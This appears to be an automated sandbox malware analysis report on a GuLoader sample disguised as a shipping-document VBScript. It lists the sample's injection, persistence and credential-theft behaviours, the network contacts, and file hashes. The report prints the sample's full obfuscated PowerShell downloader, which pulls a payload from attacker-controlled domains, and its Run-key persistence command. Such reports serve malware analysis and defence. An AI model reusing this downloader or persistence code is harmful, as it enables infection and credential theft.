Malware Analysis Report

2024-10-18 23:09

Sample ID 240522-vszccaab88
Target a1f794f5781ade202f9cbd9fc08e7f3e3b8d737792cc594c093bb4979a7ecbe4.lzh
SHA256 a1f794f5781ade202f9cbd9fc08e7f3e3b8d737792cc594c093bb4979a7ecbe4
Tags persistence guloader collection downloader
Score 10/10

Analysis Overview

score
10/10

SHA256

a1f794f5781ade202f9cbd9fc08e7f3e3b8d737792cc594c093bb4979a7ecbe4

Threat Level: Known bad

The file a1f794f5781ade202f9cbd9fc08e7f3e3b8d737792cc594c093bb4979a7ecbe4.lzh was found to be: Known bad.

Malicious Activity Summary

persistence guloader collection downloader

Guloader,Cloudeye

Nirsoft

NirSoft WebBrowserPassView

NirSoft MailPassView

Blocklisted process makes network request

Checks computer location settings

Adds Run key to start application

Accesses Microsoft Outlook accounts

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Modifies registry key

Runs ping.exe

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-22 17:15

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-22 17:15

Reported

2024-05-22 17:18

Platform

win7-20240508-en

Max time kernel

149s

Max time network

149s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Shipping document.vbs"

Signatures

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\Slidfladerne = "%Skovbyggelinjernes% -w 1 $Slutvrdier=(Get-ItemProperty -Path 'HKCU:\\Rewets\\').Cavilingness;%Skovbyggelinjernes% ($Slutvrdier)" C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1848 set thread context of 2768 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 620 wrote to memory of 2648 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2648 wrote to memory of 1936 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 620 wrote to memory of 2232 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2232 wrote to memory of 2712 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2232 wrote to memory of 1848 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1848 wrote to memory of 2960 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1848 wrote to memory of 2768 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2768 wrote to memory of 2560 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2560 wrote to memory of 2364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Shipping document.vbs"

C:\Windows\System32\cmd.exe

cmd.exe /c ping 6777.6777.6777.677e

C:\Windows\system32\PING.EXE

ping 6777.6777.6777.677e

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Undialyzeds = 1;$Forespeech='Sub';$Forespeech+='strin';$Forespeech+='g';Function Mikado($Firebolted){$Martyrologic=$Firebolted.Length-$Undialyzeds;For($Femalizes49=7;$Femalizes49 -lt $Martyrologic;$Femalizes49+=8){$Trompetdyrenes+=$Firebolted.$Forespeech.Invoke( $Femalizes49, $Undialyzeds);}$Trompetdyrenes;}function Xylyl($nougats){. ($Sprinklervsken) ($nougats);}$Guilts=Mikado 'MisbirtMm alretoOblongiz MustafiEnglevilAfkol,nl Larigoa.alteri/Metagna5 Stab.l. egions0Asbku,h Untaun.(BelejriWAssociaiUdviklin bagestdRutscheoGejstliwSagsgansBlokpol IndonesNLaboratTo forme L.isure1,ladtan0 Ran.or.Apertne0rodknol;Sultegr algesi.W S,riveiAddi,ten Lin eb6Do.atio4Elaph.d;St.vnsb Enc,untxSeed ng6 ,ogica4Adiposi;Kvindes FutilizrRugbrdsv Transi: Nongol1Bun tsd2 Denoun1Bortdmm. Me,red0Opkalds)Delites arbejdsGPalaeogeArchesic,ekognoktkkendeoUpassel/Rouil.e2Spirant0Photote1Slutpun0eftertr0 Stumbl1Hu dehu0Recitat1Hjlpe,n elsenfFGossa ei SimultrUberegneIndeksefWharfraoAftalevx To.sio/Forvalt1Painles2Drivers1I,dsmig.Cocksho0Tantiem ';$Fuldbragtes=Mikado ' ImerinUForegris Redeareti.balerJunkboa-Bon.sesACatchm gSi kerheModer,inForrykttPletter ';$Spinituberculate=Mikado ' BrndemhIndividtindsendt BankospPau,eris.nnovat:Balleti/Fossaeu/V,lfundc Al inaa OddlegdKostskoeBlokadenSeend saAmatrskdCult kle GummibrOrangeaeO,tendegBogiemaaNy etipl.ositiooCardioms.envisn.Debtorsc GravhjoNonpuebm Endoph/Ti,glysTKlbebaaoMisderiicarcasslAdresseeFilmogrtSemicelp Fil,inaSjlsr.apEkspedii .aabenr Ol,gis.Rooti.rdRispendeHumpssaptevarmel Geestso LgnersyInbitsb>Universh,ogonghtSy,kemat An,etlp Chempa:Kommpre/ Melipo/ Anderum HysteraDiabetedKammendiJefest.bVetiveraThrowworStaalvroPlacenthInnuendiGlitr tl Paral.aFortonel Glairea,mmutabt,ontradwNonprodoHunde l. 
Futurod tudercu Mudredcover,igkDe.angsd Macrocnpho.osks verflu.Tbrudsso To.seirRadiovigBrasero/VolitioaVrvlehilAllainelTotalsy/PhrynidTEtymo oo Roque.i,nterkolFilialseAfviklit UdaandpJentjenaHjertevpChackeri DividerEskadre.AntisufdNonst meCater.npbackbitlFreestooUnpoisey,urstpa ';$Smedningens=Mikado 'Unbutto> Indici ';$Sprinklervsken=Mikado 'KontokbiVolumeteHemihe.x Slingr ';$Cagot='Dockizations60';$Tilskring = Mikado ' K,stnieJan.lerc Bra.dahHande.so Chapta Expansi%Vir uela Elatc p RoughcpPanegy,dsellehyaD.imonitinitialaAchroni%Novelet\ osenstCinhivemo DissennK nnikktParfumergraver,iLsegldeb Cod.scu Starquthamrendo Gas etr Rve agsOlibanu.EpichilPHopeiteaUudslukpscuttl. Th,race&Brysth,&Outrefo El borae ProgracBrnesprhHulsle o Witlos plackletAmphirh ';Xylyl (Mikado 'Endolys$CimbrisgWispliklVirkeliopolitikbD,trugcaBgede elKotylef: Dext,if Bl.stoiKroatisrSnow owe ,ignalbParenthoH,idlgeoSenioretDishono=.vyunde(Se nmshc JunglemStarrind Flush. Snuptag/Unenwovc.cicula Supergr$EnsformTR sideniSedlersl Essayes TrammikBotulinrEphebeuiAr.ejdsn DerivegScrimwi)Subclam ');Xylyl (Mikado 'Hyper,c$ Erotisg .rikkelSubd.ntoMesa.icb Blokada Sy,axalIrascib:Bug,hypDBice,tri BagtrasJenmakekMicr tyoTransakgOp,oegerFakticia Jeaporf KroniniViljenssFru.tlekSjattefelegemulsj.gtpro=Jellstu$PamphleSForsinkpChalleni MegalenToralhaiGennembtHumo riuSubd,vibUneffigeSk,ltonr.gsvinbc IlioisuAr,enohlMass oraGent getAcalycae F lset. 
VenstrsAlmenvepBor,deslEls,liniTopske.t.layful(Thermof$Ud.andsS Car.urmGalvanoeShillald P ogrenMateriaiDurriesnA.arerngEjendomeProtoclnStueflus reatta)Indisti ');$Spinituberculate=$Diskografiskes[0];$Illegitimated= (Mikado ' Immite$o ercrigEngramblDraughtoWharfsibShippi aRauwolflSh mpoo:Li.ehooE UnsecllTourellePenitencAtionertAntimonropflgnioTruebludIndavlei Tav.rna InterilInklu,eyOmvekslzSedimene DebatsrTi skri=ReekspoNNedmejneS ltierw Rustvo-Alchem O ntioxibFlja,tejEnchanteSchizo c Pourbot E curs su,keneSNon,oveyMicawbesSaturnitHormonoeOverprim undive.TrsklerNmateriaeNringentTythesr.T,pefliWNyreligeM,nkesmbDeaminaCNaringil stubblirhagioneCheilodnBrugermt');$Illegitimated+=$fireboot[1];Xylyl ($Illegitimated);Xylyl (Mikado 'Englify$Dift,ngE Orni hlVilkaareTr,nsmicSelvk,et aggadirUndtageoTraadkudGentiliiPortr,tapalliatlSor.kjoyTilstrbzEksercie Draftsrunnomin.AfsendeH Rapp leAeroplaaPrangerdPersoniePlanc.er Snitsls ,lektr[Journal$ lcladhFAeonicauFripladlladdersdi,nisatbIntemper,vershoabum,sybgNglepert Subro,eOpisthosA,strin]Jaz,eta= ibrop$,lettebGUnde,feu Reph ti Ansv,rl PassivtScabbiesAnsgnin ');$Akrobat=Mikado ' skamfe$SmadrenESvmmendlForslageDevastecStnkpudtRhamnusr Isobu,odiagonadPeduncliUnstrenaFilatellUnwithdyIxodidszMgtediseNonaccrr.atapho.SystemaD sdvaneoKittieswVerse tnBrs frolHjesteroKorr,spaFjervgtdAf.temnFRastestiArkfde,lCr,dworeMithrai(Supiner$BestignSVristrep omdoebiPro,ptenBlindg,i PapirbtRetouc u,unkersbFejlbehe ayerdorSprogvicOverlreu fontinlGoyetiaaUnmedictReedlikeanattaf,Billard$SkeetbrN FurrileRecursidCydippegSeid mrrSapropeaNoege,hvAtt.akt)Marmo p ';$Nedgrav=$fireboot[0];Xylyl (Mikado 'Udso gt$Fly tengUn,nhablT,talssoBaarebub ScowedaSemikollDa idsf:Omf,rmaLC.orouseProgra.jKajakkeeKarbidlvAutoex rBevidstd PizziciStrong e Mis ikrB,ddestnu derhoeSnashessQual.ag1Malerin2Antithe9Incompr= Onc ov(coron.tTRyghvireFolkekusskubor,tHesitat-InformaPmismateaeksistetReequiphOfayscr Landsk$Trff.lsNFlyvereeAdo neddCellefogPsychoprKuglefoaKirurgevAs,hete)Misplan 
');while (!$Lejevrdiernes129) {Xylyl (Mikado 'Sande,e$Basitemg Af,nnelStoushcoCivildobVerdensaDemilitlStartko:CongregtLark.omrdaisyssy ppositk aftrripEpisiorlH rmitia SekunddDizequ,eAf entnrTyvebetsMancipa=unstout$Afprikkt SupranrSamsvaruk,ittede Ejeste ') ;Xylyl $Akrobat;Xylyl (Mikado 'JdesmicSCe ebrotScrollea,inemasrLaughert aparth-Cardi pSKastanil Skak pe.atamane CostaepMrkbar Prostat4 fistul ');Xylyl (Mikado 'Bevogtn$ untasegBarse,vlTurdansoDosmersbBlegnetaLandingl Assent:Oste.naLHarrowmeSamucanjSmithieeO strukvPerfectr Indruld EchinoiOttili eHysterirU,seignnSyleconeUnexpersTys hed1 Co ege2Stangsp9Rastpla=Kryptis(Engra nTRenskreeSuperins CirkattPriserk-UtaalelP systema DoitsptHenvejrh .omspr Intervi$undespoNPerisyse BambusdNabogitgDebindsrKulturfaHidrrtev Pepton)fdninge ') ;Xylyl (Mikado 'beskfti$smre rag Igua.olap roaco H vnebbSanseapaSfartsblUndisag:Intour.HLsbarhejLitteraoEpi,hylr ThumbptEfterree S,prantFruitwoaSemi,bskFrem.rek LyskureSn bsninOvercom=Bl mmes$ SkaldygB.adgullOverwaro elelitbSkyllevaMisprovl Flydev:Imp rraU DejlignMesomordSpagheteSonogr,rIdeeltscViljeslrkammerje TilskasUdtrykstUerstat1Dackeri6Diedric0 Landst+Engleli+ Eart.m% A,etyl$pupilsbDTjenesti BalkarsGipsd.pk .rikkeoBac risgGopurakrResoluta .rydsff SukkeriSlutfass .lycopkSkibskie NoncussSnkning.KedushacbyudvikoPentecouSanguifn agpiedtSelvris ') ;$Spinituberculate=$Diskografiskes[$Hjortetakken];}$Forlngelseslovs=308238;$udenlandsdanskerne=30330;Xylyl (Mikado 'Nidoros$Er oldeg MilliblLiberalo Ch omebMetzgonaUndervalSimulat:SintredLToppunkvBronzeveparadism CollecaJan.erkn KidnapkWarehoueOveracurRntgenfnFarvetaeMercato Begrudg=Galagal Eje ahoGScalenoeGeneraltSubprep-MusedesC Lsr,fooLimen,enD.scocat,emisapecoronitnJagten.tI.terfi Multiv$Syrer iNAchesove Fo,srgd BaccalgThromborlienteraSagprosvfarvepr ');Xylyl (Mikado 'Syp.ere$Pros,avgAftvinglcibariooUformaabfremelsaBet linlR,stjer: Lrre,sUEsk,ldsn AnskuebPreplacrT,ssesuoSpildola Ra,pedc Mi,ieuha.simileKana iedKommise Blodser=Unhypot 
Kilomol[.epleteS Pentagy Bobes.sStegenetValvulae talblomInterre.aneurinC Lrest,oUbefjednPlastikvLskedr.e oolierrSolmodntHaglgev] Hypos :,rocivi: Sk,mplF etrolar.dringsogracioum JumperBAfterdaaGadel usIndenrieprogram6icteric4 VinderS Granult Sulphar IncaseiLondonen Nonparg Hovedr(persona$BautastLTaxaudlvTranspieSleth gmW.ltonbaMo phinnSanseorkAgariciejazzmusr MatsornBeregnieDiethyl)Skibspr ');Xylyl (Mikado 'Nove,in$StoachsgRevokselSystemeoGra.ciabIsomer.aEnfoldil gifted:Overh nUManicurrAgentureTempyogdUnrollme,ksekvetZin,ify edisma=Glycero Mollusc[UrgoniaSSin ulayNoncancsForetyptOverproeOveri.ym Kryd h.TelotreT R bstieEkviperx Sprogft L poli.bevilliEMatchsanBevislicSystempoBe onardForskriiM,lticonHalshvigTacheom]Acervat: ster,l:SolospiASpinketSM toposCbuskrseI,etoolsIBestykn.LavatoeG egisteedisapprtUds,yknS NondiftBo.tlbnrDa regniPhenospn rdigmogStikfor(Stuearr$TilhyllULegaliznliannatbNonsimurSpaanplo TophueaStanke,c Xip.ochmakro aeSmovsetd,ecolor)Hng,nde ');Xylyl (Mikado 'Klatvas$ryg,adeg StaveslYeom,nloAutomobbBestia a un.labl Telefo: ummertBTroloveeFakticir .esvrlibudg tslKassebgdUdgiftssElektro=Mistill$ Zamar,UOutbo,ir PestereGau.sfid Knarkee evaport T resn.ElixatisNoninteu OphidsbCuticulsN,ncommtinvent rSp.rrowiPsykotene,evatogRitu,li( Penepl$ ci iusFF,nansloHydrolorBrndk mlMelolonnTrst,trg.kftedeeSankthalDia,kopsS,beslaeF ockres enckesl MaadenoSwazilnvAngelihsSalgsch,Lutoses$NattelyuAs icsmdco,certeComputenSlvtjsslPostulaanontra.nHj.rnevdEncolors AnguludR,eoptaa mmersenParrings afspilkErkendeeSinopiarKorr,mpnGulfedpeTonomet)grund t ');Xylyl $Berilds;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Contributors.Pap && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" with the same obfuscated script argument as the C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe process above

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Contributors.Pap && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Slidfladerne" /t REG_EXPAND_SZ /d "%Skovbyggelinjernes% -w 1 $Slutvrdier=(Get-ItemProperty -Path 'HKCU:\Rewets\').Cavilingness;%Skovbyggelinjernes% ($Slutvrdier)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Slidfladerne" /t REG_EXPAND_SZ /d "%Skovbyggelinjernes% -w 1 $Slutvrdier=(Get-ItemProperty -Path 'HKCU:\Rewets\').Cavilingness;%Skovbyggelinjernes% ($Slutvrdier)"

Network

Country Destination Domain Proto
US 8.8.8.8:53 6777.6777.6777.677e udp
US 8.8.8.8:53 cadenaderegalos.com udp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 8.8.8.8:53 madibarohilalatwo.duckdns.org udp
DE 84.247.187.12:80 madibarohilalatwo.duckdns.org tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 tcp

Files

memory/2232-4-0x000007FEF5E7E000-0x000007FEF5E7F000-memory.dmp

memory/2232-5-0x000000001B540000-0x000000001B822000-memory.dmp

memory/2232-6-0x0000000001E00000-0x0000000001E08000-memory.dmp

memory/2232-7-0x000007FEF5BC0000-0x000007FEF655D000-memory.dmp

memory/2232-9-0x000007FEF5BC0000-0x000007FEF655D000-memory.dmp

memory/2232-8-0x000007FEF5BC0000-0x000007FEF655D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\62FTBH5A1A3YLDVCCVCZ.temp

MD5 6b2021e9e801b35d751d7774787e88d9
SHA1 a4718e958efa7c830b37dc1b5bc8d77902cc588f
SHA256 2b11bf60370618bf5806552d9d0515c04bfdb0c0d1db137621cd8cd9bb77d3fc
SHA512 7b62ce57d669f9e07c8d239ef97e23d3de8625cc640a21a45519af346cdf6f5f976d4b74e3f630286e66c6029a578192e28178a5c85336bb5c0b5436100ac683

C:\Users\Admin\AppData\Roaming\Contributors.Pap

MD5 6d3d810b1b531a393dd8a200f17378b8
SHA1 bc31c057297d2b467a46d843030f1ff377f55f1e
SHA256 786447c3a5269cec661eb9e7bea51a58df805afaceb116677ff1974cc0d6d7df
SHA512 a77ecb7cc1d0bb183fdef43747f7156bd72e5fcb32e2e8c7671a926707b313245e08b682ce03b6b862f9f4ff1f62cf566d98fbde3384c67b60c0a2cb8dcbf358

memory/2232-15-0x000007FEF5BC0000-0x000007FEF655D000-memory.dmp

memory/2232-16-0x000007FEF5E7E000-0x000007FEF5E7F000-memory.dmp

memory/2232-17-0x000007FEF5BC0000-0x000007FEF655D000-memory.dmp

memory/1848-18-0x0000000006480000-0x0000000007971000-memory.dmp

memory/2768-20-0x0000000000890000-0x00000000018F2000-memory.dmp

memory/2232-27-0x000007FEF5BC0000-0x000007FEF655D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-22 17:15

Reported

2024-05-22 17:18

Platform

win10v2004-20240508-en

Max time kernel

149s

Max time network

149s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Shipping document.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Program Files (x86)\windows mail\wab.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Slidfladerne = "%Skovbyggelinjernes% -w 1 $Slutvrdier=(Get-ItemProperty -Path 'HKCU:\\Rewets\\').Cavilingness;%Skovbyggelinjernes% ($Slutvrdier)" C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 712 wrote to memory of 2508 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2508 wrote to memory of 1232 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 712 wrote to memory of 2728 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2728 wrote to memory of 1088 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2728 wrote to memory of 3956 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3956 wrote to memory of 4740 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3956 wrote to memory of 2780 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2780 wrote to memory of 2616 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2616 wrote to memory of 4844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2780 wrote to memory of 2204 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2780 wrote to memory of 2100 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2780 wrote to memory of 4052 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2780 wrote to memory of 5112 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Shipping document.vbs"

C:\Windows\System32\cmd.exe

cmd.exe /c ping 6777.6777.6777.677e

C:\Windows\system32\PING.EXE

ping 6777.6777.6777.677e

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Undialyzeds = 1;$Forespeech='Sub';$Forespeech+='strin';$Forespeech+='g';Function Mikado($Firebolted){$Martyrologic=$Firebolted.Length-$Undialyzeds;For($Femalizes49=7;$Femalizes49 -lt $Martyrologic;$Femalizes49+=8){$Trompetdyrenes+=$Firebolted.$Forespeech.Invoke( $Femalizes49, $Undialyzeds);}$Trompetdyrenes;}function Xylyl($nougats){. ($Sprinklervsken) ($nougats);}$Guilts=Mikado 'MisbirtMm alretoOblongiz MustafiEnglevilAfkol,nl Larigoa.alteri/Metagna5 Stab.l. egions0Asbku,h Untaun.(BelejriWAssociaiUdviklin bagestdRutscheoGejstliwSagsgansBlokpol IndonesNLaboratTo forme L.isure1,ladtan0 Ran.or.Apertne0rodknol;Sultegr algesi.W S,riveiAddi,ten Lin eb6Do.atio4Elaph.d;St.vnsb Enc,untxSeed ng6 ,ogica4Adiposi;Kvindes FutilizrRugbrdsv Transi: Nongol1Bun tsd2 Denoun1Bortdmm. Me,red0Opkalds)Delites arbejdsGPalaeogeArchesic,ekognoktkkendeoUpassel/Rouil.e2Spirant0Photote1Slutpun0eftertr0 Stumbl1Hu dehu0Recitat1Hjlpe,n elsenfFGossa ei SimultrUberegneIndeksefWharfraoAftalevx To.sio/Forvalt1Painles2Drivers1I,dsmig.Cocksho0Tantiem ';$Fuldbragtes=Mikado ' ImerinUForegris Redeareti.balerJunkboa-Bon.sesACatchm gSi kerheModer,inForrykttPletter ';$Spinituberculate=Mikado ' BrndemhIndividtindsendt BankospPau,eris.nnovat:Balleti/Fossaeu/V,lfundc Al inaa OddlegdKostskoeBlokadenSeend saAmatrskdCult kle GummibrOrangeaeO,tendegBogiemaaNy etipl.ositiooCardioms.envisn.Debtorsc GravhjoNonpuebm Endoph/Ti,glysTKlbebaaoMisderiicarcasslAdresseeFilmogrtSemicelp Fil,inaSjlsr.apEkspedii .aabenr Ol,gis.Rooti.rdRispendeHumpssaptevarmel Geestso LgnersyInbitsb>Universh,ogonghtSy,kemat An,etlp Chempa:Kommpre/ Melipo/ Anderum 